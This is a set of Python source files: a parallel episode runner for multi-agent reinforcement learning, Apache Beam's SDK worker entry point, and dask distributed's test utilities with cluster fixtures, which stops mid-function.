self.mac.select_actions(self.batch, t_ep=self.t, t_env=self.t_env, bs=envs_not_terminated, test_mode=test_mode) cpu_actions = actions.to("cpu").numpy() # Update the actions taken actions_chosen = { "actions": actions.unsqueeze(1) } self.batch.update(actions_chosen, bs=envs_not_terminated, ts=self.t, mark_filled=False) # Send actions to each env action_idx = 0 for idx, parent_conn in enumerate(self.parent_conns): if idx in envs_not_terminated: # We produced actions for this env if not terminated[idx]: # Only send the actions to the env if it hasn't terminated parent_conn.send(("step", cpu_actions[action_idx])) action_idx += 1 # actions is not a list over every env # Update envs_not_terminated envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed] all_terminated = all(terminated) if all_terminated: break # Post step data we will insert for the current timestep post_transition_data = { "reward": [], "terminated": [] } # Data for the next step we will insert in order to select an action pre_transition_data = { "state": [], "avail_actions": [], "obs": [] } # Receive data back for each unterminated env for idx, parent_conn in enumerate(self.parent_conns): if not terminated[idx]: data = parent_conn.recv() # Remaining data for this current timestep post_transition_data["reward"].append((data["reward"],)) episode_returns[idx] += data["reward"] episode_lengths[idx] += 1 if not test_mode: self.env_steps_this_run += 1 env_terminated = False if data["terminated"]: final_env_infos.append(data["info"]) if data["terminated"] and not data["info"].get("episode_limit", False): env_terminated = True terminated[idx] = data["terminated"] post_transition_data["terminated"].append((env_terminated,)) # Data for the next timestep needed to select an action pre_transition_data["state"].append(data["state"]) pre_transition_data["avail_actions"].append(data["avail_actions"]) pre_transition_data["obs"].append(data["obs"]) # Add post_transiton data into the batch self.batch.update(post_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=False) # Move onto the next timestep self.t += 1 # Add the pre-transition data self.batch.update(pre_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=True) if not test_mode: self.t_env += self.env_steps_this_run # Get stats back for each env for parent_conn in self.parent_conns: parent_conn.send(("get_stats",None)) env_stats = [] for parent_conn in self.parent_conns: env_stat = parent_conn.recv() env_stats.append(env_stat) cur_stats = self.test_stats if test_mode else self.train_stats cur_returns = self.test_returns if test_mode else self.train_returns log_prefix = "test_" if test_mode else "" infos = [cur_stats] + final_env_infos cur_stats.update({k: sum(d.get(k, 0) for d in infos) for k in set.union(*[set(d) for d in infos])}) cur_stats["n_episodes"] = self.batch_size + cur_stats.get("n_episodes", 0) cur_stats["ep_length"] = sum(episode_lengths) + cur_stats.get("ep_length", 0) cur_returns.extend(episode_returns) n_test_runs = max(1, self.args.test_nepisode // self.batch_size) * self.batch_size if test_mode and (len(self.test_returns) == n_test_runs): self._log(cur_returns, cur_stats, log_prefix) elif self.t_env - self.log_train_stats_t >= self.args.runner_log_interval: self._log(cur_returns, cur_stats, log_prefix) if hasattr(self.mac.action_selector, "epsilon"): self.logger.log_stat("epsilon", self.mac.action_selector.epsilon, self.t_env) self.log_train_stats_t = self.t_env return self.batch def _log(self, returns, stats, prefix): self.logger.log_stat(prefix + "return_mean", np.mean(returns), self.t_env) self.logger.log_stat(prefix + "return_std", np.std(returns), self.t_env) returns.clear() for k, v in stats.items(): if k != "n_episodes": self.logger.log_stat(prefix + k + "_mean" , v/stats["n_episodes"], self.t_env) stats.clear() def env_worker(remote, env_fn): # Make environment env = env_fn.x() while True: cmd, data = remote.recv() if cmd == "step": actions = data # Take a step in the environment reward, terminated, env_info = env.step(actions) # Return the observations, avail_actions and state to make the next action state = env.get_state() avail_actions = env.get_avail_actions() obs = env.get_obs() remote.send({ # Data for the next timestep needed to pick an action "state": state, "avail_actions": avail_actions, "obs": obs, # Rest of the data for the current timestep "reward": reward, "terminated": terminated, "info": env_info }) elif cmd == "reset": env.reset() remote.send({ "state": env.get_state(), "avail_actions": env.get_avail_actions(), "obs": env.get_obs() }) elif cmd == "close": env.close() remote.close() break elif cmd == "get_env_info": remote.send(env.get_env_info()) elif cmd == "get_stats": remote.send(env.get_stats()) else: raise NotImplementedError class CloudpickleWrapper(): """ Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle) """ def __init__(self, x): self.x = x def __getstate__(self): import cloudpickle return cloudpickle.dumps(self.x) def __setstate__(self, ob): import pickle self.x = pickle.loads(ob)
sdk_worker_main.py
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """SDK Fn Harness entry point.""" from __future__ import absolute_import import http.server import json import logging import os import re import sys import threading import traceback from builtins import object from google.protobuf import text_format from apache_beam.internal import pickler from apache_beam.options.pipeline_options import DebugOptions from apache_beam.options.pipeline_options import PipelineOptions from apache_beam.options.pipeline_options import ProfilingOptions from apache_beam.portability.api import endpoints_pb2 from apache_beam.runners.internal import names from apache_beam.runners.worker.log_handler import FnApiLogRecordHandler from apache_beam.runners.worker.sdk_worker import SdkHarness from apache_beam.utils import profiler # This module is experimental. No backwards-compatibility guarantees. class StatusServer(object): @classmethod def get_thread_dump(cls): lines = [] frames = sys._current_frames() # pylint: disable=protected-access for t in threading.enumerate(): lines.append('--- Thread #%s name: %s ---\n' % (t.ident, t.name)) lines.append(''.join(traceback.format_stack(frames[t.ident]))) return lines def start(self, status_http_port=0): """Executes the serving loop for the status server. Args: status_http_port(int): Binding port for the debug server. Default is 0 which means any free unsecured port """ class StatusHttpHandler(http.server.BaseHTTPRequestHandler): """HTTP handler for serving stacktraces of all threads.""" def do_GET(self): # pylint: disable=invalid-name """Return all thread stacktraces information for GET request.""" self.send_response(200) self.send_header('Content-Type', 'text/plain') self.end_headers() for line in StatusServer.get_thread_dump(): self.wfile.write(line.encode('utf-8')) def log_message(self, f, *args): """Do not log any messages.""" pass self.httpd = httpd = http.server.HTTPServer( ('localhost', status_http_port), StatusHttpHandler) logging.info('Status HTTP server running at %s:%s', httpd.server_name, httpd.server_port) httpd.serve_forever() def main(unused_argv): """Main entry point for SDK Fn Harness.""" if 'LOGGING_API_SERVICE_DESCRIPTOR' in os.environ: try: logging_service_descriptor = endpoints_pb2.ApiServiceDescriptor() text_format.Merge(os.environ['LOGGING_API_SERVICE_DESCRIPTOR'], logging_service_descriptor) # Send all logs to the runner. fn_log_handler = FnApiLogRecordHandler(logging_service_descriptor) # TODO(BEAM-5468): This should be picked up from pipeline options. logging.getLogger().setLevel(logging.INFO) logging.getLogger().addHandler(fn_log_handler) logging.info('Logging handler created.') except Exception: logging.error("Failed to set up logging handler, continuing without.", exc_info=True) fn_log_handler = None else: fn_log_handler = None # Start status HTTP server thread. thread = threading.Thread(name='status_http_server', target=StatusServer().start) thread.daemon = True thread.setName('status-server-demon') thread.start() if 'PIPELINE_OPTIONS' in os.environ: sdk_pipeline_options = _parse_pipeline_options( os.environ['PIPELINE_OPTIONS']) else: sdk_pipeline_options = PipelineOptions.from_dictionary({}) if 'SEMI_PERSISTENT_DIRECTORY' in os.environ: semi_persistent_directory = os.environ['SEMI_PERSISTENT_DIRECTORY'] else: semi_persistent_directory = None logging.info('semi_persistent_directory: %s', semi_persistent_directory) _worker_id = os.environ.get('WORKER_ID', None) try: _load_main_session(semi_persistent_directory) except Exception: # pylint: disable=broad-except exception_details = traceback.format_exc() logging.error( 'Could not load main session: %s', exception_details, exc_info=True) try: logging.info('Python sdk harness started with pipeline_options: %s', sdk_pipeline_options.get_all_options(drop_default=True)) service_descriptor = endpoints_pb2.ApiServiceDescriptor() text_format.Merge(os.environ['CONTROL_API_SERVICE_DESCRIPTOR'], service_descriptor) # TODO(robertwb): Support credentials. assert not service_descriptor.oauth2_client_credentials_grant.url SdkHarness( control_address=service_descriptor.url, worker_count=_get_worker_count(sdk_pipeline_options), worker_id=_worker_id, profiler_factory=profiler.Profile.factory_from_options( sdk_pipeline_options.view_as(ProfilingOptions)) ).run() logging.info('Python sdk harness exiting.') except: # pylint: disable=broad-except logging.exception('Python sdk harness failed: ') raise finally: if fn_log_handler: fn_log_handler.close() def _parse_pipeline_options(options_json): options = json.loads(options_json) # Check the options field first for backward compatibility. if 'options' in options: return PipelineOptions.from_dictionary(options.get('options')) else: # Remove extra urn part from the key. portable_option_regex = r'^beam:option:(?P<key>.*):v1$' return PipelineOptions.from_dictionary({ re.match(portable_option_regex, k).group('key') if re.match(portable_option_regex, k) else k: v for k, v in options.items() }) def _get_worker_count(pipeline_options): """Extract worker count from the pipeline_options. This defines how many SdkWorkers will be started in this Python process. And each SdkWorker will have its own thread to process data. Name of the experimental parameter is 'worker_threads' Example Usage in the Command Line: --experimental worker_threads=1 Note: worker_threads is an experimental flag and might not be available in future releases. Returns: an int containing the worker_threads to use. Default is 12 """ experiments = pipeline_options.view_as(DebugOptions).experiments experiments = experiments if experiments else [] for experiment in experiments: # There should only be 1 match so returning from the loop if re.match(r'worker_threads=', experiment): return int( re.match(r'worker_threads=(?P<worker_threads>.*)', experiment).group('worker_threads')) return 12 def _load_main_session(semi_persistent_directory): """Loads a pickled main session from the path specified.""" if semi_persistent_directory: session_file = os.path.join(semi_persistent_directory, 'staged', names.PICKLED_MAIN_SESSION_FILE) if os.path.isfile(session_file): pickler.load_session(session_file) else: logging.warning( 'No session file found: %s. Functions defined in __main__ ' '(interactive session) may fail.', session_file) else: logging.warning( 'No semi_persistent_directory found: Functions defined in __main__ ' '(interactive session) may fail.') if __name__ == '__main__': main(sys.argv)
utils_test.py
import asyncio import collections import copy import functools import gc import inspect import io import itertools import logging import logging.config import os import queue import re import shutil import signal import socket import subprocess import sys import tempfile import threading import uuid import warnings import weakref from contextlib import contextmanager, nullcontext, suppress from glob import glob from time import sleep from distributed.scheduler import Scheduler try: import ssl except ImportError: ssl = None import pytest from tlz import assoc, memoize, merge from tornado import gen from tornado.ioloop import IOLoop import dask from . import system from .client import Client, _global_clients, default_client from .comm import Comm from .compatibility import WINDOWS from .config import initialize_logging from .core import CommClosedError, Status, connect, rpc from .deploy import SpecCluster from .diagnostics.plugin import WorkerPlugin from .metrics import time from .nanny import Nanny from .proctitle import enable_proctitle_on_children from .security import Security from .utils import ( DequeHandler, TimeoutError, _offload_executor, get_ip, get_ipv6, iscoroutinefunction, log_errors, mp_context, reset_logger_locks, sync, thread_state, ) from .worker import Worker try: import dask.array # register config except ImportError: pass logger = logging.getLogger(__name__) logging_levels = { name: logger.level for name, logger in logging.root.manager.loggerDict.items() if isinstance(logger, logging.Logger) } _TEST_TIMEOUT = 30 _offload_executor.submit(lambda: None).result() # create thread during import @pytest.fixture(scope="session") def valid_python_script(tmpdir_factory): local_file = tmpdir_factory.mktemp("data").join("file.py") local_file.write("print('hello world!')") return local_file @pytest.fixture(scope="session") def client_contract_script(tmpdir_factory): local_file = tmpdir_factory.mktemp("data").join("distributed_script.py") lines = ( "from distributed import Client", "e = Client('127.0.0.1:8989')", "print(e)", ) local_file.write("\n".join(lines)) return local_file @pytest.fixture(scope="session") def invalid_python_script(tmpdir_factory): local_file = tmpdir_factory.mktemp("data").join("file.py") local_file.write("a+1") return local_file async def cleanup_global_workers(): for worker in Worker._instances: await worker.close(report=False, executor_wait=False) @pytest.fixture def loop(): with check_instances(): with pristine_loop() as loop: # Monkey-patch IOLoop.start to wait for loop stop orig_start = loop.start is_stopped = threading.Event() is_stopped.set() def start(): is_stopped.clear() try: orig_start() finally: is_stopped.set() loop.start = start yield loop # Stop the loop in case it's still running try: sync(loop, cleanup_global_workers, callback_timeout=0.500) loop.add_callback(loop.stop) except RuntimeError as e: if not re.match("IOLoop is clos(ed|ing)", str(e)): raise except TimeoutError: pass else: is_stopped.wait() @pytest.fixture def loop_in_thread(): with pristine_loop() as loop: thread = threading.Thread(target=loop.start, name="test IOLoop") thread.daemon = True thread.start() loop_started = threading.Event() loop.add_callback(loop_started.set) loop_started.wait() yield loop loop.add_callback(loop.stop) thread.join(timeout=5) @pytest.fixture def zmq_ctx(): import zmq ctx = zmq.Context.instance() yield ctx ctx.destroy(linger=0) @contextmanager def pristine_loop(): IOLoop.clear_instance() IOLoop.clear_current() loop = IOLoop() loop.make_current() assert IOLoop.current() is loop try: yield loop finally: try: loop.close(all_fds=True) except (KeyError, ValueError): pass IOLoop.clear_instance() IOLoop.clear_current() @contextmanager def mock_ipython(): from unittest import mock from distributed._ipython_utils import remote_magic ip = mock.Mock() ip.user_ns = {} ip.kernel = None def get_ip(): return ip with mock.patch("IPython.get_ipython", get_ip), mock.patch( "distributed._ipython_utils.get_ipython", get_ip ): yield ip # cleanup remote_magic client cache for kc in remote_magic._clients.values(): kc.stop_channels() remote_magic._clients.clear() original_config = copy.deepcopy(dask.config.config) def reset_config(): dask.config.config.clear() dask.config.config.update(copy.deepcopy(original_config)) def nodebug(func): """ A decorator to disable debug facilities during timing-sensitive tests. Warning: this doesn't affect already created IOLoops. """ @functools.wraps(func) def wrapped(*args, **kwargs): old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG") if old_asyncio_debug is not None: del os.environ["PYTHONASYNCIODEBUG"] try: return func(*args, **kwargs) finally: if old_asyncio_debug is not None: os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug return wrapped def nodebug_setup_module(module): """ A setup_module() that you can install in a test module to disable debug facilities. """ module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG") if module._old_asyncio_debug is not None: del os.environ["PYTHONASYNCIODEBUG"] def nodebug_teardown_module(module): """ A teardown_module() that you can install in a test module to reenable debug facilities. """ if module._old_asyncio_debug is not None: os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug def inc(x): return x + 1 def dec(x): return x - 1 def mul(x, y): return x * y def div(x, y): return x / y def deep(n): if n > 0: return deep(n - 1) else: return True def throws(x): raise RuntimeError("hello!") def double(x): return x * 2 def slowinc(x, delay=0.02): sleep(delay) return x + 1 def slowdec(x, delay=0.02): sleep(delay) return x - 1 def slowdouble(x, delay=0.02): sleep(delay) return 2 * x def randominc(x, scale=1): from random import random sleep(random() * scale) return x + 1 def slowadd(x, y, delay=0.02): sleep(delay) return x + y def slowsum(seq, delay=0.02): sleep(delay) return sum(seq) def slowidentity(*args, **kwargs): delay = kwargs.get("delay", 0.02) sleep(delay) if len(args) == 1: return args[0] else: return args def run_for(duration, timer=time): """ Burn CPU for *duration* seconds. """ deadline = timer() + duration while timer() <= deadline: pass # This dict grows at every varying() invocation _varying_dict = collections.defaultdict(int) _varying_key_gen = itertools.count() class _ModuleSlot: def __init__(self, modname, slotname): self.modname = modname self.slotname = slotname def get(self): return getattr(sys.modules[self.modname], self.slotname) def varying(items): """ Return a function that returns a result (or raises an exception) from *items* at each call. """ # cloudpickle would serialize the *values* of all globals # used by *func* below, so we can't use `global <something>`. # Instead look up the module by name to get the original namespace # and not a copy. slot = _ModuleSlot(__name__, "_varying_dict") key = next(_varying_key_gen) def func(): dct = slot.get() i = dct[key] if i == len(items): raise IndexError else: x = items[i] dct[key] = i + 1 if isinstance(x, Exception): raise x else: return x return func def map_varying(itemslists): """ Like *varying*, but return the full specification for a map() call on multiple items lists. """ def apply(func, *args, **kwargs): return func(*args, **kwargs) return apply, list(map(varying, itemslists)) async def geninc(x, delay=0.02): await asyncio.sleep(delay) return x + 1 async def asyncinc(x, delay=0.02): await asyncio.sleep(delay) return x + 1 _readone_queues = {} async def readone(comm): """ Read one message at a time from a comm that reads lists of messages. """ try: q = _readone_queues[comm] except KeyError: q = _readone_queues[comm] = asyncio.Queue() async def background_read(): while True: try: messages = await comm.read() except CommClosedError: break for msg in messages: q.put_nowait(msg) q.put_nowait(None) del _readone_queues[comm] background_read() msg = await q.get() if msg is None: raise CommClosedError else: return msg def run_scheduler(q, nputs, config, port=0, **kwargs): with dask.config.set(config): from distributed import Scheduler # On Python 2.7 and Unix, fork() is used to spawn child processes, # so avoid inheriting the parent's IO loop. with pristine_loop() as loop: async def _(): scheduler = await Scheduler( validate=True, host="127.0.0.1", port=port, **kwargs ) for i in range(nputs): q.put(scheduler.address) await scheduler.finished() try: loop.run_sync(_) finally: loop.close(all_fds=True) def run_worker(q, scheduler_q, config, **kwargs): with dask.config.set(config): from distributed import Worker reset_logger_locks() with log_errors(): with pristine_loop() as loop: scheduler_addr = scheduler_q.get() async def _(): worker = await Worker(scheduler_addr, validate=True, **kwargs) q.put(worker.address) await worker.finished() try: loop.run_sync(_) finally: loop.close(all_fds=True) def run_nanny(q, scheduler_q, config, **kwargs): with dask.config.set(config): with log_errors(): with pristine_loop() as loop: scheduler_addr = scheduler_q.get() async def _(): worker = await Nanny(scheduler_addr, validate=True, **kwargs) q.put(worker.address) await worker.finished() try: loop.run_sync(_) finally: loop.close(all_fds=True) @contextmanager def check_active_rpc(loop, active_rpc_timeout=1): active_before = set(rpc.active) yield # Some streams can take a bit of time to notice their peer # has closed, and keep a coroutine (*) waiting for a CommClosedError # before calling close_rpc() after a CommClosedError. # This would happen especially if a non-localhost address is used, # as Nanny does. # (*) (example: gather_from_workers()) def fail(): pytest.fail( "some RPCs left active by test: %s" % (set(rpc.active) - active_before) ) async def wait(): await async_wait_for( lambda: len(set(rpc.active) - active_before) == 0, timeout=active_rpc_timeout, fail_func=fail, ) loop.run_sync(wait) @pytest.fixture def cluster_fixture(loop): with cluster() as (scheduler, workers): yield (scheduler, workers) @pytest.fixture def s(cluster_fixture): scheduler, workers = cluster_fixture return scheduler @pytest.fixture def a(cluster_fixture): scheduler, workers = cluster_fixture return workers[0] @pytest.fixture def b(cluster_fixture): scheduler, workers = cluster_fixture return workers[1] @pytest.fixture def client(loop, cluster_fixture): scheduler, workers = cluster_fixture with Client(scheduler["address"], loop=loop) as client: yield client # Compatibility. A lot of tests simply use `c` as fixture name c = client @pytest.fixture def client_secondary(loop, cluster_fixture): scheduler, workers = cluster_fixture with Client(scheduler["address"], loop=loop) as client: yield client @contextmanager def tls_cluster_context( worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs ): security = security or tls_only_security() worker_kwargs = assoc(worker_kwargs or {}, "security", security) scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security) with cluster( worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs ) as (s, workers): yield s, workers @pytest.fixture def tls_cluster(loop, security): with tls_cluster_context(security=security) as (scheduler, workers): yield (scheduler, workers) @pytest.fixture def tls_client(tls_cluster, loop, security): s, workers = tls_cluster with Client(s["address"], security=security, loop=loop) as client: yield client @pytest.fixture def security(): return tls_only_security() @contextmanager def cluster( nworkers=2, nanny=False, worker_kwargs={}, active_rpc_timeout=10, disconnect_timeout=20, scheduler_kwargs={}, config={}, ): ws = weakref.WeakSet() enable_proctitle_on_children() with clean(timeout=active_rpc_timeout, threads=False) as loop: if nanny: _run_worker = run_nanny else: _run_worker = run_worker # The scheduler queue will receive the scheduler's address scheduler_q = mp_context.Queue() # Launch scheduler scheduler = mp_context.Process( name="Dask cluster test: Scheduler", target=run_scheduler, args=(scheduler_q, nworkers + 1, config), kwargs=scheduler_kwargs, ) ws.add(scheduler) scheduler.daemon = True scheduler.start() # Launch workers workers = [] for i in range(nworkers): q = mp_context.Queue() fn = "_test_worker-%s" % uuid.uuid4() kwargs = merge( { "nthreads": 1, "local_directory": fn, "memory_limit": system.MEMORY_LIMIT, }, worker_kwargs, ) proc = mp_context.Process( name="Dask cluster test: Worker", target=_run_worker, args=(q, scheduler_q, config), kwargs=kwargs, ) ws.add(proc) workers.append({"proc": proc, "queue": q, "dir": fn}) for worker in workers: worker["proc"].start() try: for worker in workers: worker["address"] = worker["queue"].get(timeout=5) except queue.Empty: raise pytest.xfail.Exception("Worker failed to start in test") saddr = scheduler_q.get() start = time() try: try: security = scheduler_kwargs["security"] rpc_kwargs = {"connection_args": security.get_connection_args("client")} except KeyError: rpc_kwargs = {} with rpc(saddr, **rpc_kwargs) as s: while True: nthreads = loop.run_sync(s.ncores) if len(nthreads) == nworkers: break if time() - start > 5: raise Exception("Timeout on cluster creation") # avoid sending processes down to function yield {"address": saddr}, [ {"address": w["address"], "proc": weakref.ref(w["proc"])} for w in workers ] finally: logger.debug("Closing out test cluster") loop.run_sync( lambda: disconnect_all( [w["address"] for w in workers], timeout=disconnect_timeout, rpc_kwargs=rpc_kwargs, ) ) loop.run_sync( lambda: disconnect( saddr, timeout=disconnect_timeout, rpc_kwargs=rpc_kwargs ) ) scheduler.terminate() scheduler_q.close() scheduler_q._reader.close() scheduler_q._writer.close() for w in workers: w["proc"].terminate() w["queue"].close() w["queue"]._reader.close() w["queue"]._writer.close() scheduler.join(2) del scheduler for proc in [w["proc"] for w in workers]: proc.join(timeout=30) with suppress(UnboundLocalError): del worker, w, proc del workers[:] for fn in glob("_test_worker-*"): with suppress(OSError): shutil.rmtree(fn) try: client = default_client() except ValueError: pass else: client.close() start = time() while any(proc.is_alive() for proc in ws): text = str(list(ws)) sleep(0.2) assert time() < start + 5, ("Workers still around after five seconds", text) async def disconnect(addr, timeout=3, rpc_kwargs=None): rpc_kwargs = rpc_kwargs or {} async def do_disconnect(): with rpc(addr, **rpc_kwargs) as w: # If the worker was killed hard (e.g. sigterm) during test runtime, # we do not know at this point and may not be able to connect with suppress(EnvironmentError, CommClosedError): # Do not request a reply since comms will be closed by the # worker before a reply can be made and we will always trigger # the timeout await w.terminate(reply=False) await asyncio.wait_for(do_disconnect(), timeout=timeout) async def disconnect_all(addresses, timeout=3, rpc_kwargs=None): await asyncio.gather(*[disconnect(addr, timeout, rpc_kwargs) for addr in addresses]) def gen_test(timeout=_TEST_TIMEOUT): """Coroutine test @gen_test(timeout=5) async def test_foo(): await ... # use tornado coroutines """ def _(func): def test_func(): with clean() as loop: if iscoroutinefunction(func): cor = func else: cor = gen.coroutine(func) loop.run_sync(cor, timeout=timeout) return test_func return _ async def start_cluster( nthreads, scheduler_addr, loop, security=None, Worker=Worker, scheduler_kwargs={}, worker_kwargs={}, ): s = await Scheduler( loop=loop, validate=True, security=security, port=0, host=scheduler_addr, **scheduler_kwargs, ) workers = [ Worker( s.address, nthreads=ncore[1], name=i, security=security, loop=loop, validate=True, host=ncore[0], **(merge(worker_kwargs, ncore[2]) if len(ncore) > 2 else worker_kwargs), ) for i, ncore in enumerate(nthreads) ] # for w in workers: # w.rpc = workers[0].rpc await asyncio.gather(*workers) start = time() while len(s.workers) < len(nthreads) or any( comm.comm is None for comm in s.stream_comms.values() ): await asyncio.sleep(0.01) if time() - start > 5: await asyncio.gather(*[w.close(timeout=1) for w in workers]) await s.close(fast=True) raise Exception("Cluster creation timeout") return s, workers async def end_cluster(s, workers): logger.debug("Closing out test cluster") async def end_worker(w): with suppress(TimeoutError, CommClosedError, EnvironmentError): await w.close(report=False) await asyncio.gather(*[end_worker(w) for w in workers]) await s.close() # wait until scheduler stops completely s.stop() def gen_cluster( nthreads=[("127.0.0.1", 1), ("127.0.0.1", 2)], ncores=None, scheduler="127.0.0.1", timeout=_TEST_TIMEOUT, security=None, Worker=Worker, client=False, scheduler_kwargs={}, worker_kwargs={}, client_kwargs={}, active_rpc_timeout=1, config={}, clean_kwargs={}, allow_unclosed=False, ): from distributed import Client """ Coroutine test with small cluster @gen_cluster() async def test_foo(scheduler, worker1, worker2): await ... # use tornado coroutines @pytest.mark.parametrize("param", [1, 2, 3]) @gen_cluster() async def test_foo(scheduler, worker1, worker2, param): await ... # use tornado coroutines @gen_cluster() async def test_foo(scheduler, worker1, worker2, pytest_fixture_a, pytest_fixture_b): await ... # use tornado coroutines See also: start end """ if ncores is not None: warnings.warn("ncores= has moved to nthreads=", stacklevel=2) nthreads = ncores worker_kwargs = merge( {"memory_limit": system.MEMORY_LIMIT, "death_timeout": 10}, worker_kwargs ) def _(func): if not iscoroutinefunction(func): func = gen.coroutine(func) def test_func(*outer_args, **kwargs): result = None workers = [] with clean(timeout=active_rpc_timeout, **clean_kwargs) as loop: async def coro(): with dask.config.set(config): s = False for _ in range(60): try: s, ws = await start_cluster( nthreads, scheduler, loop, security=security, Worker=Worker, scheduler_kwargs=scheduler_kwargs, worker_kwargs=worker_kwargs, ) except Exception as e: logger.error( "Failed to start gen_cluster: " f"{e.__class__.__name__}: {e}; retrying", exc_info=True, ) await asyncio.sleep(1) else: workers[:] = ws args = [s] + workers break if s is False: raise Exception("Could not start cluster") if client: c = await Client( s.address, loop=loop, security=security, asynchronous=True, **client_kwargs, ) args = [c] + args try: future = func(*args, *outer_args, **kwargs) if timeout: future = asyncio.wait_for(future, timeout) result = await future if s.validate: s.validate_state() finally: if client and c.status not in ("closing", "closed"): await c._close(fast=s.status == Status.closed) await end_cluster(s, workers) await asyncio.wait_for(cleanup_global_workers(), 1) try: c = await default_client() except ValueError: pass else: await c._close(fast=True) def get_unclosed(): return [c for c in Comm._instances if not c.closed()] + [ c for c in _global_clients.values() if c.status != "closed" ] try: start = time() while time() < start + 60: gc.collect() if not get_unclosed(): break await asyncio.sleep(0.05) else: if allow_unclosed: print(f"Unclosed Comms: {get_unclosed()}") else: raise RuntimeError("Unclosed Comms", get_unclosed()) finally: Comm._instances.clear() _global_clients.clear() return result result = loop.run_sync( coro, timeout=timeout * 2 if timeout else timeout ) for w in workers: if getattr(w, "data", None): try: w.data.clear() except EnvironmentError: # zict backends can fail if their storage directory # was already removed pass del w.data return result # Patch the signature so pytest can inject fixtures orig_sig = inspect.signature(func) args = [None] * (1 + len(nthreads)) # scheduler, *workers if client: args.insert(0, None) bound = orig_sig.bind_partial(*args) test_func.__signature__ = orig_sig.replace( parameters=[ p for name, p in orig_sig.parameters.items() if name not in bound.arguments ] ) return test_func return _ def raises(func, exc=Exception): try: func() return False except exc: return True def terminate_process(proc): if proc.poll() is None: if sys.platform.startswith("win"): proc.send_signal(signal.CTRL_BREAK_EVENT) else: proc.send_signal(signal.SIGINT) try: proc.wait(10) finally: # Make sure we don't leave the process lingering around with suppress(OSError): proc.kill() @contextmanager def popen(args, **kwargs): kwargs["stdout"] = subprocess.PIPE kwargs["stderr"] = subprocess.PIPE if sys.platform.startswith("win"): # Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP dump_stdout = False args = list(args) if sys.platform.startswith("win"): args[0] = os.path.join(sys.prefix, "Scripts", args[0]) else: args[0] = os.path.join( os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0] ) proc = subprocess.Popen(args, **kwargs) try: yield proc except Exception: dump_stdout = True raise finally: try: terminate_process(proc) finally: # XXX Also dump stdout if return code != 0 ? out, err = proc.communicate() if dump_stdout: print("\n\nPrint from stderr\n %s\n=================\n" % args[0][0]) print(err.decode()) print("\n\nPrint from stdout\n=================\n") print(out.decode()) def wait_for_port(address, timeout=5): assert isinstance(address, tuple) deadline = time() + timeout while True: timeout = deadline - time() if timeout < 0: raise RuntimeError("Failed to connect to %s" % (address,)) try: sock = socket.create_connection(address, timeout=timeout) except EnvironmentError: pass else: sock.close() break def wait_for(predicate, timeout, fail_func=None, period=0.001): deadline = time() + timeout while not predicate(): sleep(period) if time() > deadline: if fail_func is not None: fail_func() pytest.fail("condition not reached until %s seconds" % (timeout,)) async def async_wait_for(predicate, timeout, fail_func=None, period=0.001): deadline = time() + timeout while not predicate(): await asyncio.sleep(period) if time() > deadline: if fail_func is not None: fail_func() pytest.fail("condition not reached until %s seconds" % (timeout,)) @memoize def has_ipv6(): """ Return whether IPv6 is locally functional. This doesn't guarantee IPv6 is properly configured outside of localhost. """ if os.getenv("DISABLE_IPV6") == "1": return False serv = cli = None try: serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) serv.bind(("::", 0)) serv.listen(5) cli = socket.create_connection(serv.getsockname()[:2]) except EnvironmentError: return False else: return True finally: if cli is not None: cli.close() if serv is not None: serv.close() if has_ipv6(): def requires_ipv6(test_func): return test_func else: requires_ipv6 = pytest.mark.skip("ipv6 required") async def assert_can_connect(addr, timeout=0.5, **kwargs): """ Check that it is possible to connect to the distributed *addr* within the given *timeout*. """ comm = await connect(addr, timeout=timeout, **kwargs) comm.abort() async def assert_cannot_connect( addr, timeout=0.5, exception_class=EnvironmentError, **kwargs ): """ Check that it is impossible to connect to the distributed *addr* within the given *timeout*. """ with pytest.raises(exception_class): comm = await connect(addr, timeout=timeout, **kwargs) comm.abort() async def assert_can_connect_from_everywhere_4_6(port, protocol="tcp", **kwargs): """ Check that the local *port* is reachable from all IPv4 and IPv6 addresses. """ futures = [ assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs), assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs), ] if has_ipv6(): futures += [ assert_can_connect("%s://[::1]:%d" % (protocol, port), **kwargs), assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs), ] await asyncio.gather(*futures) async def assert_can_connect_from_everywhere_4(port, protocol="tcp", **kwargs): """ Check that the local *port* is reachable from all IPv4 addresses. """ futures = [ assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs), assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs), ] if has_ipv6(): futures += [ assert_cannot_connect("%s://[::1]:%d" % (protocol, port), **kwargs), assert_cannot_connect( "%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs ), ] await asyncio.gather(*futures) async def assert_can_connect_locally_4(port, **kwargs): """ Check that the local *port* is only reachable from local IPv4 addresses. """ futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, **kwargs)] if get_ip() != "127.0.0.1": # No outside IPv4 connectivity? futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs)] if has_ipv6(): futures += [ 